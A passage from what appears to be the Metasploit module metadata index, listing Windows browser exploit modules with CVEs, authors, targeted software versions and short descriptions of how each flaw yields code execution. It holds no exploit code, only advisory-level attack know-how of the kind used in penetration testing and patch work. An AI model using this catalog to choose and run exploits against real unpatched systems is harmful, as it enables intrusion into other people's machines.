"path": "/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb",
"is_install_path": true,
"ref_name": "windows/browser/oracle_dc_submittoexpress",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/oracle_webcenter_checkoutandopen": {
"name": "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/oracle_webcenter_checkoutandopen",
"rank": 600,
"disclosure_date": "2013-04-16",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the Oracle WebCenter Content\n CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where\n user controlled input is used to call ShellExecuteExW(). This module abuses the\n control to execute an arbitrary HTA from a remote location. This module has been\n tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle\n WebCenter Content 11.1.1.6.0.",
"references": [
"CVE-2013-1559",
"OSVDB-92386",
"BID-59122",
"URL-http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html",
"ZDI-13-094"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb",
"is_install_path": true,
"ref_name": "windows/browser/oracle_webcenter_checkoutandopen",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/orbit_connecting": {
"name": "Orbit Downloader Connecting Log Creation Buffer Overflow",
"full_name": "exploit/windows/browser/orbit_connecting",
"rank": 300,
"disclosure_date": "2009-02-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an\n attacker serves up a malicious web site, arbitrary code may be executed.\n The PAYLOAD windows/shell_bind_tcp works best.",
"references": [
"CVE-2009-0187",
"OSVDB-52294",
"BID-33894"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-SP2"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/orbit_connecting.rb",
"is_install_path": true,
"ref_name": "windows/browser/orbit_connecting",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ovftool_format_string": {
"name": "VMWare OVF Tools Format String Vulnerability",
"full_name": "exploit/windows/browser/ovftool_format_string",
"rank": 300,
"disclosure_date": "2012-11-08",
"type": "exploit",
"author": [
"Jeremy Brown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.",
"references": [
"CVE-2012-3569",
"OSVDB-87117",
"BID-56468",
"URL-http://www.vmware.com/security/advisories/VMSA-2012-0015.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VMWare OVF Tools 2.1 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ovftool_format_string.rb",
"is_install_path": true,
"ref_name": "windows/browser/ovftool_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/pcvue_func": {
"name": "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",
"full_name": "exploit/windows/browser/pcvue_func",
"rank": 200,
"disclosure_date": "2011-10-05",
"type": "exploit",
"author": [
"Luigi Auriemma",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <roccogiovannicalvi@gmail.com >"
],
"description": "This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.\n By setting a dword value for the SaveObject() or LoadObject(), an attacker can\n overwrite a function pointer and execute arbitrary code.",
"references": [
"CVE-2011-4044",
"OSVDB-77561",
"BID-49795",
"URL-http://aluigi.altervista.org/adv/pcvue_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer 6 / Internet Explorer 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/pcvue_func.rb",
"is_install_path": true,
"ref_name": "windows/browser/pcvue_func",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/persits_xupload_traversal": {
"name": "Persits XUpload ActiveX MakeHttpRequest Directory Traversal",
"full_name": "exploit/windows/browser/persits_xupload_traversal",
"rank": 600,
"disclosure_date": "2009-09-29",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a directory traversal in Persits Software Inc's\n XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.\n By passing a string containing \"..\\\" sequences to the MakeHttpRequest method,\n an attacker is able to write arbitrary files to arbitrary locations on disk.\n\n Code execution occurs by writing to the All Users Startup Programs directory.\n You may want to combine this module with the use of exploit/multi/handler since a\n user would have to log for the payload to execute.",
"references": [
"CVE-2009-3693",
"OSVDB-60001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/persits_xupload_traversal.rb",
"is_install_path": true,
"ref_name": "windows/browser/persits_xupload_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/quickr_qp2_bof": {
"name": "IBM Lotus QuickR qp2 ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/quickr_qp2_bof",
"rank": 300,
"disclosure_date": "2012-05-23",
"type": "exploit",
"author": [
"Gaurav Baruah",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the qp2.dll installed with the IBM Lotus Quickr product.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module\n msvcr71.dll is used. This one is installed with the qp2 ActiveX.",
"references": [
"CVE-2012-2176",
"OSVDB-82166",
"BID-53678",
"ZDI-12-134",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21596191"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/quickr_qp2_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/quickr_qp2_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/real_arcade_installerdlg": {
"name": "Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",
"full_name": "exploit/windows/browser/real_arcade_installerdlg",
"rank": 300,
"disclosure_date": "2011-04-03",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The \"exec\"\n function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n on the victim machine.",
"references": [
"OSVDB-71559",
"EDB-17105"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb",
"is_install_path": true,
"ref_name": "windows/browser/real_arcade_installerdlg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_cdda_uri": {
"name": "RealNetworks RealPlayer CDDA URI Initialization Vulnerability",
"full_name": "exploit/windows/browser/realplayer_cdda_uri",
"rank": 300,
"disclosure_date": "2010-11-15",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an initialization flaw within RealPlayer 11/11.1 and\n RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object\n initialization failure. However, this failure is improperly handled and\n uninitialized memory executed.",
"references": [
"CVE-2010-3747",
"OSVDB-68673",
"BID-44144",
"ZDI-10-210",
"URL-http://service.real.com/realplayer/security/10152010_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RealPlayer SP 1.0 - 1.1.4 Universal",
"RealPlayer 11.0 - 11.1 Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/realplayer_cdda_uri.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_cdda_uri",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_console": {
"name": "RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",
"full_name": "exploit/windows/browser/realplayer_console",
"rank": 300,
"disclosure_date": "2008-03-08",
"type": "exploit",
"author": [
"Elazar Broad <elazarb@earthlink.net>"
],
"description": "This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n By sending a specially crafted string to the 'Console' property\n in the rmoc3260.dll control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-1309",
"OSVDB-42946",
"BID-28157",
"URL-http://secunia.com/advisories/29315/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/realplayer_console.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_console",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_import": {
"name": "RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",
"full_name": "exploit/windows/browser/realplayer_import",
"rank": 300,
"disclosure_date": "2007-10-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n method, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-5601",
"OSVDB-41430",
"BID-26130"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE / RealOne Player 2 (6.0.11.853)",
"IE / RealPlayer 10.5 (6.0.12.1483)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/realplayer_import.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_import",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_qcp": {
"name": "RealNetworks Realplayer QCP Parsing Heap Overflow",
"full_name": "exploit/windows/browser/realplayer_qcp",
"rank": 200,
"disclosure_date": "2011-08-16",
"type": "exploit",
"author": [
"Sean de Regge",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow in Realplayer when handling a .QCP file.\n The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is\n allocated on the heap and user-supplied data from the file is copied within a\n memory copy loop.\n\n This allows a remote attacker to execute arbitrary code running in the context\n of the web browser via a .QCP file with a specially crafted \"fmt\" chunk.\n At this moment this module exploits the flaw on Windows XP IE6, IE7.",
"references": [
"CVE-2011-2950",
"OSVDB-74549",
"BID-49172",
"ZDI-11-265",
"URL-http://service.real.com/realplayer/security/08162011_player/en/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6 on XP SP3",
"Internet Explorer 7 on XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/realplayer_qcp.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_qcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/realplayer_smil": {
"name": "RealNetworks RealPlayer SMIL Buffer Overflow",
"full_name": "exploit/windows/browser/realplayer_smil",
"rank": 300,
"disclosure_date": "2005-03-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n By creating a URL link to a malicious SMIL file, a remote attacker could\n overflow a buffer and execute arbitrary code.\n When using this module, be sure to set the URIPATH with an extension of '.smil'.\n This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n build 6.0.9.584.",
"references": [
"CVE-2005-0455",
"OSVDB-14305",
"BID-12698"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RealPlayer 10/8 on Windows 2000 SP0-SP4 English",
"RealPlayer 10/8 on Windows XP PRO SP0-SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/realplayer_smil.rb",
"is_install_path": true,
"ref_name": "windows/browser/realplayer_smil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/roxio_cineplayer": {
"name": "Roxio CinePlayer ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/roxio_cineplayer",
"rank": 300,
"disclosure_date": "2007-04-11",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n By setting an overly long value to 'DiskType', an attacker can overrun\n a buffer and execute arbitrary code.",
"references": [
"CVE-2007-1559",
"OSVDB-34779",
"BID-23412"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/roxio_cineplayer.rb",
"is_install_path": true,
"ref_name": "windows/browser/roxio_cineplayer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/safari_xslt_output": {
"name": "Apple Safari Webkit libxslt Arbitrary File Creation",
"full_name": "exploit/windows/browser/safari_xslt_output",
"rank": 600,
"disclosure_date": "2011-07-20",
"type": "exploit",
"author": [
"Nicolas Gregoire"
],
"description": "This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.",
"references": [
"CVE-2011-1774",
"OSVDB-74017",
"URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/safari_xslt_output.rb",
"is_install_path": true,
"ref_name": "windows/browser/safari_xslt_output",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/samsung_neti_wiewer_backuptoavi_bof": {
"name": "Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow",
"full_name": "exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof",
"rank": 300,
"disclosure_date": "2012-04-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed\n with the Samsung NET-i viewer 1.37.\n\n Specifically, when supplying a long string for the fname parameter to the\n BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer\n overflow due to the use of memcpy with an incorrect size, resulting in remote code\n execution under the context of the user.",
"references": [
"CVE-2012-4333",
"OSVDB-81453",
"BID-53193",
"URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/samsung_neti_wiewer_backuptoavi_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/samsung_security_manager_put": {
"name": "Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution",
"full_name": "exploit/windows/browser/samsung_security_manager_put",
"rank": 600,
"disclosure_date": "2016-08-05",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>"
],
"description": "This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481\n by exploiting the vulnerability against the client-side. This exploit has been tested successfully using\n IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. Finally\n a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.",
"references": [
"URL-http://www.zerodayinitiative.com/advisories/ZDI-15-156/",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-16-481/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Samsung Security Manager 1.32 & 1.4 Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/samsung_security_manager_put.rb",
"is_install_path": true,
"ref_name": "windows/browser/samsung_security_manager_put",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/sapgui_saveviewtosessionfile": {
"name": "SAP AG SAPgui EAI WebViewer3D Buffer Overflow",
"full_name": "exploit/windows/browser/sapgui_saveviewtosessionfile",
"rank": 300,
"disclosure_date": "2009-03-31",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n with SAPgui. When passing an overly long string the SaveViewToSessionFile()\n method, arbitrary code may be executed.",
"references": [
"CVE-2007-4475",
"OSVDB-53066",
"US-CERT-VU-985449"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb",
"is_install_path": true,
"ref_name": "windows/browser/sapgui_saveviewtosessionfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/siemens_solid_edge_selistctrlx": {
"name": "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/siemens_solid_edge_selistctrlx",
"rank": 300,
"disclosure_date": "2013-05-26",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.\n The vulnerability exists on several APIs provided by the control, where user supplied input\n is handled as a memory pointer without proper validation, allowing an attacker to read and\n corrupt memory from the target process. This module abuses the methods NumChildren() and\n DeleteItem() in order to achieve memory info leak and remote code execution respectively.\n This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,\n using Solid Edge 10.4.",
"references": [
"OSVDB-93696",
"EDB-25712"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb",
"is_install_path": true,
"ref_name": "windows/browser/siemens_solid_edge_selistctrlx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/softartisans_getdrivename": {
"name": "SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/softartisans_getdrivename",
"rank": 300,
"disclosure_date": "2008-08-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-1682",
"OSVDB-47794",
"US-CERT-VU-914785",
"BID-30826"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/softartisans_getdrivename.rb",
"is_install_path": true,
"ref_name": "windows/browser/softartisans_getdrivename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/sonicwall_addrouteentry": {
"name": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/sonicwall_addrouteentry",
"rank": 300,
"disclosure_date": "2007-11-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-5603",
"OSVDB-39069",
"URL-http://www.sec-consult.com/303.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 6 / Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/sonicwall_addrouteentry.rb",
"is_install_path": true,
"ref_name": "windows/browser/sonicwall_addrouteentry",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_altirisdeployment_downloadandinstall": {
"name": "Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/symantec_altirisdeployment_downloadandinstall",
"rank": 600,
"disclosure_date": "2009-09-09",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to install and execute arbitrary files on a users file system via\n AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.",
"references": [
"BID-36346",
"CVE-2009-3028",
"OSVDB-57893"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_altirisdeployment_downloadandinstall",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_altirisdeployment_runcmd": {
"name": "Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/symantec_altirisdeployment_runcmd",
"rank": 300,
"disclosure_date": "2009-11-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n When sending an overly long string to RunCmd() method of\n AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2009-3033",
"BID-37092",
"OSVDB-60496"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_altirisdeployment_runcmd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_appstream_unsafe": {
"name": "Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/symantec_appstream_unsafe",
"rank": 600,
"disclosure_date": "2009-01-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n method. The insecure method can be exploited to download and execute arbitrary files in the\n context of the currently logged-on user.",
"references": [
"CVE-2008-4388",
"OSVDB-51410"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/symantec_appstream_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_appstream_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_backupexec_pvcalendar": {
"name": "Symantec BackupExec Calendar Control Buffer Overflow",
"full_name": "exploit/windows/browser/symantec_backupexec_pvcalendar",
"rank": 300,
"disclosure_date": "2008-02-28",
"type": "exploit",
"author": [
"Elazar Broad <elazarb@earthlink.net>"
],
"description": "This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n By sending an overly long string to the \"_DOWText0\" property located\n in the pvcalendar.ocx control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-6016",
"OSVDB-42358",
"BID-26904",
"URL-http://secunia.com/advisories/27885/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_backupexec_pvcalendar",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/symantec_consoleutilities_browseandsavefile": {
"name": "Symantec ConsoleUtilities ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/symantec_consoleutilities_browseandsavefile",
"rank": 300,
"disclosure_date": "2009-11-02",
"type": "exploit",
"author": [
"Nikolas Sotiriu (lofi)"
],
"description": "This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.\n By sending an overly long string to the \"BrowseAndSaveFile()\" method located\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n execute arbitrary code",
"references": [
"CVE-2009-3031",
"OSVDB-59597",
"BID-36698",
"URL-http://sotiriu.de/adv/NSOADV-2009-001.txt",
"URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English",
"Windows XP SP2 Universal",
"Windows XP SP2 Pro German",
"Windows XP SP3 Pro German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb",
"is_install_path": true,
"ref_name": "windows/browser/symantec_consoleutilities_browseandsavefile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/synactis_connecttosynactis_bof": {
"name": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",
"full_name": "exploit/windows/browser/synactis_connecttosynactis_bof",
"rank": 300,
"disclosure_date": "2013-05-30",
"type": "exploit",
"author": [
"h1ch4m",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.",
"references": [
"OSVDB-93754",
"EDB-25835"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
